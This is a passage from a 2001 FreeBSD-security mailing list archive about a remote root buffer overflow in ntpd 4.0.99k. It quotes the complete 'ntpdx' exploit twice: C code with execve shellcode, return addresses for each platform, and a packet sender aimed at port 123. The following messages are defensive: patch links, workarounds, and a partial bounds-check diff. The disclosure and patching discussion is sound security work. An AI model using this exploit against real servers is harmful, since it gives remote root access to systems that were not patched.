}, > > { NULL, NULL, NULL, 0x0, 0, 0, 0 } >}; > >long getip(name) >char *name; >{ > struct hostent *hp; > long ip; > extern int h_errno; > > if ((ip = inet_addr(name)) < 0) > { > if (!(hp = gethostbyname(name))) > { > fprintf(stderr, "gethostbyname(): %s\n", > strerror(h_errno)); > exit(1); > } > memcpy(&ip, (hp->h_addr), 4); > } > > return ip; >} > >int doquery(host, ret, shellcode, align, shalign) >char *host, *shellcode; >long ret; >int align, shalign; >{ > /* tcpdump-based reverse engineering :)) */ > > char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61, > 0x74, 0x75, 0x6d, 0x3d }; > > char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, > 0x00, 0x00, 0x00, 0x00 }; > > char buf[PKTSIZ], *p; > long *ap; > int i; > > int sockfd; > struct sockaddr_in sa; > > bzero(&sa, sizeof(sa)); > > sa.sin_family = AF_INET; > sa.sin_port = htons(123); > sa.sin_addr.s_addr = getip(host); > > if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) > { > perror("socket"); > return -1; > } > > if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0) > { > perror("connect"); > close(sockfd); > return -1; > } > > memset(buf, NOP, PKTSIZ); > memcpy(buf, q2, sizeof(q2)); > > p = buf + align; > ap = (unsigned long *)p; > > for(i=0;i *ap++ = ret; > > p = (char *)ap; > > memcpy(buf+shalign, shellcode, strlen(shellcode)); > > if((write(sockfd, buf, PKTSIZ)) < 0) > { > perror("write"); > close(sockfd); > return -1; > } > > fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ, > strlen(shellcode)); > fflush(stderr); > > if ((write(sockfd, q3, sizeof(q3))) < 0) > { > perror("write"); > close(sockfd); > return -1; > } > > fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3)); > fflush(stderr); > > close(sockfd); > return 0; >} > >int main(argc, argv) >int argc; >char **argv; >{ > extern int optind, opterr; > extern char *optarg; > int ch, type, ofs, i; > long ret; > > opterr = ofs = 0; > type = -1; > > while ((ch = getopt(argc, argv, "t:o:")) != -1) > switch((char)ch) > { > case 't': > type = atoi(optarg); > break; > > case 'o': > ofs = atoi(optarg); > break; > > case '?': > default: > puts(usage); > exit(0); > > } > > argc -= optind; > argv += optind; > > fprintf(stderr, "ntpdx v1.0 by venglin@freebsd.lublin.pl\n\n"); > > if (type < 0) > { > fprintf(stderr, "Please select platform:\n"); > for (i=0;targ[i].os;i++) > { > fprintf(stderr, "\t-t %d : %s %s (%p)\n", i, > targ[i].os, targ[i].version, (void *)targ[i].ret); > } > > exit(0); > } > > fprintf(stderr, "Selected platform: %s with ntpd %s\n\n", > targ[type].os, targ[type].version); > > ret = targ[type].ret; > ret += ofs; > > if (argc != 1) > { > puts(usage); > exit(0); > } > > fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n", > (void *)ret, targ[type].align, targ[type].shalign); > > if (doquery(*argv, ret, targ[type].code, targ[type].align, > targ[type].shalign) < 0) > { > fprintf(stderr, "Failed.\n"); > exit(1); > } > > fprintf(stderr, "Done.\n"); > > if (!targ[type].port) > { > fprintf(stderr, "/tmp/sh was spawned.\n"); > exit(0); > } > > exit(0); >} > >-- >* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * >* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17: 7: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from meow.osd.bsdi.com (meow.osd.bsdi.com [204.216.28.88]) by hub.freebsd.org (Postfix) with ESMTP id 85CAB37B43E; Wed, 4 Apr 2001 17:06:57 -0700 (PDT) (envelope-from jhb@FreeBSD.org) Received: from laptop.baldwin.cx (john@jhb-laptop.osd.bsdi.com [204.216.28.241]) by meow.osd.bsdi.com (8.11.2/8.11.2) with ESMTP id f3506TG52369; Wed, 4 Apr 2001 17:06:29 -0700 (PDT) (envelope-from jhb@FreeBSD.org) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <002d01c0bc6d$2d558390$035778d8@sherline.net> Date: Wed, 04 Apr 2001 17:06:02 -0700 (PDT) From: John Baldwin To: Jeremiah Gowdy Subject: Re: su change? Cc: freebsd-security@FreeBSD.org, freebsd-stable@FreeBSD.org, Kherry Zamore , Matthew Emmerton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 03-Apr-01 Jeremiah Gowdy wrote: > >> > if (!chshell(pwd->pw_shell) && ruid) >> > errx(1, "permission denied (shell)."); >> > >> > The only thing we need to prepend to this is a check to see if we are >> trying >> > to su to root, which we should allow regardless of the shell specified: >> >> I disagree. The root account is an account that needs to have the highest >> number of security checks present. > > Then make a point as to why root, when not having a valid shell, not being > able to log in is a useful security check in any way shape or form. So Last time I checked single-user was a shape. The real problem here is people changing root's shell. You shouldn't be logging in as root in the first place. I remember back in the 2.1.x and 2.2.x days when .cshrc actually used to yell at people if you logged in as root. Use sudo, supser, su2, or su -m instead. Root's login shell and login shell files should be kept simple and sane and not dinked with. This is a people problem with the administrators in question and hacking up su is not the right fix. -- John Baldwin -- http://www.FreeBSD.org/~jhb/ PGP Key: http://www.baldwin.cx/~john/pgpkey.asc "Power Users Use the Power to Serve!" - http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:10:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from fangg.lbl.gov (fangg.lbl.gov [128.3.1.103]) by hub.freebsd.org (Postfix) with ESMTP id 57F0737B423 for ; Wed, 4 Apr 2001 17:10:23 -0700 (PDT) (envelope-from dart@nersc.gov) Received: from usul.nersc.gov (usul [192.168.1.115]) by fangg.lbl.gov (Postfix) with ESMTP id 159BE1F55; Wed, 4 Apr 2001 17:10:23 -0700 (PDT) Received: from usul.nersc.gov (localhost [127.0.0.1]) by usul.nersc.gov (Postfix) with ESMTP id 935A027; Wed, 4 Apr 2001 17:10:19 -0700 (PDT) X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 To: freebsd-security@FreeBSD.ORG Cc: pat@databits.net Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-Reply-To: Message from Poul-Henning Kamp of "Thu, 05 Apr 2001 01:55:57 +0200." <52565.986428557@critter> Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_854596055P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Wed, 04 Apr 2001 17:10:19 -0700 From: Eli Dart Message-Id: <20010405001019.935A027@usul.nersc.gov> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --==_Exmh_854596055P Content-Type: text/plain; charset=us-ascii Any chance these changes could be propagated to the port? It's still 4.0.99k as of 5 minutes ago....ipf rules work in some cases, but not all...... --eli In reply to Poul-Henning Kamp : > > This has already been fixed in FreeBSD current & stable an hour > ago or so. > > Poul-Henning > > > In message <3ACBB263.2804E9C2@ursine.com>, Michael Bryan writes: > > > >Heads up. This just came across BugTraq, will likely affect FreeBSD. > >As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b. > > > > > >-------- Original Message -------- > >From: Przemyslaw Frasunek > >Subject: ntpd =< 4.0.99k remote buffer overflow > >To: BUGTRAQ@SECURITYFOCUS.COM > > > >/* ntpd remote root exploit / babcia padlina ltd. */ > > > >/* > > * Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerab le > > * to remote buffer overflow attack. It occurs when building response for > > * a query with large readvar argument. In almost all cases, ntpd is running > > * with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeser ver. > > * > > * Althought it's a normal buffer overflow, exploiting it is much harder. > > * Destination buffer is accidentally damaged, when attack is performed, so > > * shellcode can't be larger than approx. 70 bytes. This proof of concept co de > > * uses small execve() shellcode to run /tmp/sh binary. Full remote attack > > * is possible. > > * > > * NTP is stateless UDP based protocol, so all malicious queries can be > > * spoofed. > > * > > * Example of use on generic RedHat 7.0 box: > > * > > * [venglin@cipsko venglin]$ cat dupa.c > > * main() { setreuid(0,0); system("chmod 4755 /bin/sh"); } > > * [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c > > * [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c > > * [venglin@cipsko venglin]$ ./ntpdx -t2 localhost > > * ntpdx v1.0 by venglin@freebsd.lublin.pl > > * > > * Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh) > > * > > * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query > > * [1] <- evil query (pkt = 512 | shell = 45) > > * [2] <- null query (pkt = 12) > > * Done. > > * /tmp/sh was spawned. > > * [venglin@cipsko venglin]$ ls -al /bin/bash > > * -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash > > * > > */ > > > >#include > >#include > >#include > >#include > >#include > >#include > >#include > >#include > >#include > >#include > > > >#define NOP 0x90 > >#define ADDRS 8 > >#define PKTSIZ 512 > > > >static char usage[] = "usage: ntpdx [-o offset] <-t type> "; > > > >/* generic execve() shellcodes */ > > > >char lin_execve[] = > > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > > "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; > > > >char bsd_execve[] = > > "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" > > "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" > > "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01" > > "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; > > > >struct platforms > >{ > > char *os; > > char *version; > > char *code; > > long ret; > > int align; > > int shalign; > > int port; > >}; > > > >/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet > > * *after* RET address. This values will vary from platform to platform. > > */ > > > >struct platforms targ[] = > >{ > > { "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve, > > 0xbfbff8bc, 200, 220, 0 }, > > > > { "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve, > > 0xbfbff540, 200, 220, 0 }, > > > > { "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve, > > 0xbffff777, 240, 160, 0 }, > > > > { NULL, NULL, NULL, 0x0, 0, 0, 0 } > >}; > > > >long getip(name) > >char *name; > >{ > > struct hostent *hp; > > long ip; > > extern int h_errno; > > > > if ((ip = inet_addr(name)) < 0) > > { > > if (!(hp = gethostbyname(name))) > > { > > fprintf(stderr, "gethostbyname(): %s\n", > > strerror(h_errno)); > > exit(1); > > } > > memcpy(&ip, (hp->h_addr), 4); > > } > > > > return ip; > >} > > > >int doquery(host, ret, shellcode, align, shalign) > >char *host, *shellcode; > >long ret; > >int align, shalign; > >{ > > /* tcpdump-based reverse engineering :)) */ > > > > char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, > > 0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61, > > 0x74, 0x75, 0x6d, 0x3d }; > > > > char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, > > 0x00, 0x00, 0x00, 0x00 }; > > > > char buf[PKTSIZ], *p; > > long *ap; > > int i; > > > > int sockfd; > > struct sockaddr_in sa; > > > > bzero(&sa, sizeof(sa)); > > > > sa.sin_family = AF_INET; > > sa.sin_port = htons(123); > > sa.sin_addr.s_addr = getip(host); > > > > if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) > > { > > perror("socket"); > > return -1; > > } > > > > if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0) > > { > > perror("connect"); > > close(sockfd); > > return -1; > > } > > > > memset(buf, NOP, PKTSIZ); > > memcpy(buf, q2, sizeof(q2)); > > > > p = buf + align; > > ap = (unsigned long *)p; > > > > for(i=0;i > *ap++ = ret; > > > > p = (char *)ap; > > > > memcpy(buf+shalign, shellcode, strlen(shellcode)); > > > > if((write(sockfd, buf, PKTSIZ)) < 0) > > { > > perror("write"); > > close(sockfd); > > return -1; > > } > > > > fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ, > > strlen(shellcode)); > > fflush(stderr); > > > > if ((write(sockfd, q3, sizeof(q3))) < 0) > > { > > perror("write"); > > close(sockfd); > > return -1; > > } > > > > fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3)); > > fflush(stderr); > > > > close(sockfd); > > > return 0; > >} > > > >int main(argc, argv) > >int argc; > >char **argv; > >{ > > extern int optind, opterr; > > extern char *optarg; > > int ch, type, ofs, i; > > long ret; > > > > opterr = ofs = 0; > > type = -1; > > > > while ((ch = getopt(argc, argv, "t:o:")) != -1) > > switch((char)ch) > > { > > case 't': > > type = atoi(optarg); > > break; > > > > case 'o': > > ofs = atoi(optarg); > > break; > > > > case '?': > > default: > > puts(usage); > > exit(0); > > > > } > > > > argc -= optind; > > argv += optind; > > > > fprintf(stderr, "ntpdx v1.0 by venglin@freebsd.lublin.pl\n\n"); > > > > if (type < 0) > > { > > fprintf(stderr, "Please select platform:\n"); > > for (i=0;targ[i].os;i++) > > { > > fprintf(stderr, "\t-t %d : %s %s (%p)\n", i, > > targ[i].os, targ[i].version, (void *)targ[i].ret); > > } > > > > exit(0); > > } > > > > fprintf(stderr, "Selected platform: %s with ntpd %s\n\n", > > targ[type].os, targ[type].version); > > > > ret = targ[type].ret; > > ret += ofs; > > > > if (argc != 1) > > { > > puts(usage); > > exit(0); > > } > > > > fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n", > > (void *)ret, targ[type].align, targ[type].shalign); > > > > if (doquery(*argv, ret, targ[type].code, targ[type].align, > > targ[type].shalign) < 0) > > { > > fprintf(stderr, "Failed.\n"); > > exit(1); > > } > > > > fprintf(stderr, "Done.\n"); > > > > if (!targ[type].port) > > { > > fprintf(stderr, "/tmp/sh was spawned.\n"); > > exit(0); > > } > > > > exit(0); > >} > > > >-- > >* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * > >* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > -- > Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 > phk@FreeBSD.ORG | TCP/IP since RFC 956 > FreeBSD committer | BSD since 4.3-tahoe > Never attribute to malice what can adequately be explained by incompetence. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > --==_Exmh_854596055P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: Exmh version 2.3.1 01/18/2001 iD8DBQE6y7frLTFEeF+CsrMRAn2cAKCC6wGNaadWF6M1sDe7TGCCfhZBWwCfeqsA sBiyDxYcx+M87S5Q0oI/nPw= =IrKX -----END PGP SIGNATURE----- --==_Exmh_854596055P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:14:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 7AB2A37B43F for ; Wed, 4 Apr 2001 17:14:22 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f350E8t52877; Thu, 5 Apr 2001 02:14:08 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Eli Dart Cc: freebsd-security@FreeBSD.ORG, pat@databits.net Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-Reply-To: Your message of "Wed, 04 Apr 2001 17:10:19 PDT." <20010405001019.935A027@usul.nersc.gov> Date: Thu, 05 Apr 2001 02:14:08 +0200 Message-ID: <52875.986429648@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20010405001019.935A027@usul.nersc.gov>, Eli Dart writes: >--==_Exmh_854596055P >Content-Type: text/plain; charset=us-ascii > >Any chance these changes could be propagated to the port? It's still >4.0.99k as of 5 minutes ago....ipf rules work in some cases, but not >all...... Sure, pull the patch out of the cvs tree: http://www.freebsd.org/cgi/cvsweb.cgi/src/contrib/ntp/ntpd/ntp_control.c.diff?r1=1.1&r2=1.2 It should apply with no problems.... I have to hit the hay now, so somebody else gets to do the honours... -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:14:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 3034037B446 for ; Wed, 4 Apr 2001 17:14:48 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA10418; Wed, 4 Apr 2001 18:14:42 -0600 (MDT) Message-Id: <4.3.2.7.2.20010404181106.044485d0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 04 Apr 2001 18:14:37 -0600 To: Michael Bryan , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-Reply-To: <3ACBB263.2804E9C2@ursine.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Workaround: Use /usr/sbin/ntpdate -s time.nist.gov (or pick your favorite server) periodically from /etc/crontab. (Once a day, at an odd hour and minute of the morning, is sufficient for most machines.) This is what we have always done. It reduces overhead because there isn't a daemon constantly running. --Brett At 05:46 PM 4/4/2001, Michael Bryan wrote: >Heads up. This just came across BugTraq, will likely affect FreeBSD. >As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:16:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhub.airlinksys.com (mailhub.airlinksys.com [216.70.12.6]) by hub.freebsd.org (Postfix) with ESMTP id EB40F37B43E for ; Wed, 4 Apr 2001 17:16:27 -0700 (PDT) (envelope-from sjohn@airlinksys.com) Received: from ns2.airlinksys.com (ns2.airlinksys.com [216.70.12.3]) by mailhub.airlinksys.com (Postfix) with ESMTP id 417B353501 for ; Wed, 4 Apr 2001 19:16:27 -0500 (CDT) Received: by ns2.airlinksys.com (Postfix, from userid 1000) id 733BC5DA8; Wed, 4 Apr 2001 19:16:26 -0500 (CDT) Date: Wed, 4 Apr 2001 19:16:26 -0500 From: Scott Johnson To: freebsd-security@FreeBSD.ORG Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow Message-ID: <20010404191626.A6071@ns2.airlinksys.com> Reply-To: Scott Johnson Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <3ACBB263.2804E9C2@ursine.com> <52565.986428557@critter> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <52565.986428557@critter>; from phk@critter.freebsd.dk on Thu, Apr 05, 2001 at 01:55:57AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quoth Poul-Henning Kamp on Thu, Apr 05, 2001 at 01:55:57AM +0200: > > This has already been fixed in FreeBSD current & stable an hour > ago or so. > > Poul-Henning Is a patch coming for 4.2-RELEASE? Will we just have to install the port over our system binaries, like we did with bind? In that case, it appears that just setting PREFIX=/usr won't do to overwrite the system version, since the port puts its binaries in ${PREFIX}/bin. -- Scott Johnson System/Network Administrator Airlink Systems To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:17: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id D6B0D37B446 for ; Wed, 4 Apr 2001 17:16:59 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f350Gpt52944; Thu, 5 Apr 2001 02:16:51 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Brett Glass Cc: Michael Bryan , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-Reply-To: Your message of "Wed, 04 Apr 2001 18:14:37 MDT." <4.3.2.7.2.20010404181106.044485d0@localhost> Date: Thu, 05 Apr 2001 02:16:51 +0200 Message-ID: <52942.986429811@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20010404181106.044485d0@localhost>, Brett Glass writes: >Workaround: Use > >/usr/sbin/ntpdate -s time.nist.gov (or pick your favorite server) > >periodically from /etc/crontab. (Once a day, at an odd hour and >minute of the morning, is sufficient for most machines.) This >is what we have always done. It reduces overhead because there >isn't a daemon constantly running. And it has a lot worse performance, but let's not get into that... -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:19:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 8623C37B424 for ; Wed, 4 Apr 2001 17:19:53 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f350Jgt52983; Thu, 5 Apr 2001 02:19:42 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Scott Johnson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-Reply-To: Your message of "Wed, 04 Apr 2001 19:16:26 CDT." <20010404191626.A6071@ns2.airlinksys.com> Date: Thu, 05 Apr 2001 02:19:41 +0200 Message-ID: <52981.986429981@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20010404191626.A6071@ns2.airlinksys.com>, Scott Johnson writes: >Quoth Poul-Henning Kamp on Thu, Apr 05, 2001 at 01:55:57AM +0200: >> >> This has already been fixed in FreeBSD current & stable an hour >> ago or so. >> >> Poul-Henning > >Is a patch coming for 4.2-RELEASE? Will we just have to install the port >over our system binaries, like we did with bind? In that case, it appears >that just setting PREFIX=/usr won't do to overwrite the system version, >since the port puts its binaries in ${PREFIX}/bin. The patch should apply to pretty much any version of (x)ntpd so please help yourself while I get some sleep. The patch is here: http://www.freebsd.org/cgi/cvsweb.cgi/src/contrib/ntp/ntpd/ntp_control.c.diff?r1=1.1&r2=1.2 -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:25:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id C270C37B424 for ; Wed, 4 Apr 2001 17:25:53 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id RAA22002; Wed, 4 Apr 2001 17:25:09 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda21994; Wed Apr 4 17:24:57 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f350OqR25629; Wed, 4 Apr 2001 17:24:52 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdz25625; Wed Apr 4 17:24:20 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f350OKC50297; Wed, 4 Apr 2001 17:24:20 -0700 (PDT) Message-Id: <200104050024.f350OKC50297@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdY50142; Wed Apr 4 17:23:21 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Poul-Henning Kamp Cc: Eli Dart , freebsd-security@FreeBSD.ORG, pat@databits.net Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-reply-to: Your message of "Thu, 05 Apr 2001 02:14:08 +0200." <52875.986429648@critter> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Apr 2001 17:23:21 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <52875.986429648@critter>, Poul-Henning Kamp writes: > In message <20010405001019.935A027@usul.nersc.gov>, Eli Dart writes: > >--==_Exmh_854596055P > >Content-Type: text/plain; charset=us-ascii > > > >Any chance these changes could be propagated to the port? It's still > >4.0.99k as of 5 minutes ago....ipf rules work in some cases, but not > >all...... > > Sure, pull the patch out of the cvs tree: > > http://www.freebsd.org/cgi/cvsweb.cgi/src/contrib/ntp/ntpd/ntp_control. > c.diff?r1=1.1&r2=1.2 > > It should apply with no problems.... > > I have to hit the hay now, so somebody else gets to do the honours... I've got a 4.0.99k port with the patch ready to go. Who can I send to get committed? Been using it, sans the security patch of course, since November -- well tested. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:27:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by hub.freebsd.org (Postfix) with ESMTP id EC23937B616 for ; Wed, 4 Apr 2001 17:27:07 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: (from danderse@localhost) by faith.cs.utah.edu (8.9.3/8.9.3) id SAA17343; Wed, 4 Apr 2001 18:26:46 -0600 (MDT) Message-Id: <200104050026.SAA17343@faith.cs.utah.edu> Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow To: phk@critter.freebsd.dk (Poul-Henning Kamp) Date: Wed, 4 Apr 2001 18:26:46 -0600 (MDT) Cc: sjohn@airlinksys.com (Scott Johnson), freebsd-security@FreeBSD.ORG In-Reply-To: <52981.986429981@critter> from "Poul-Henning Kamp" at Apr 05, 2001 02:19:41 AM From: "David G. Andersen" X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It doesn't go cleanly to my 4.2-STABLE I stripped out the inessential bits of the patch: diff -u -r1.1.1.2 ntp_control.c --- ntp_control.c 2000/01/28 14:53:03 1.1.1.2 +++ ntp_control.c 2001/04/05 00:26:04 @@ -1649,8 +1649,20 @@ tp = buf; while (cp < reqend && isspace((int)*cp)) cp++; - while (cp < reqend && *cp != ',') + while (cp < reqend && *cp != ',') { *tp++ = *cp++; + if (tp > buf + sizeof(buf)) { + msyslog(LOG_WARNING, "Attempted \"ntpdx\" exploit from IP 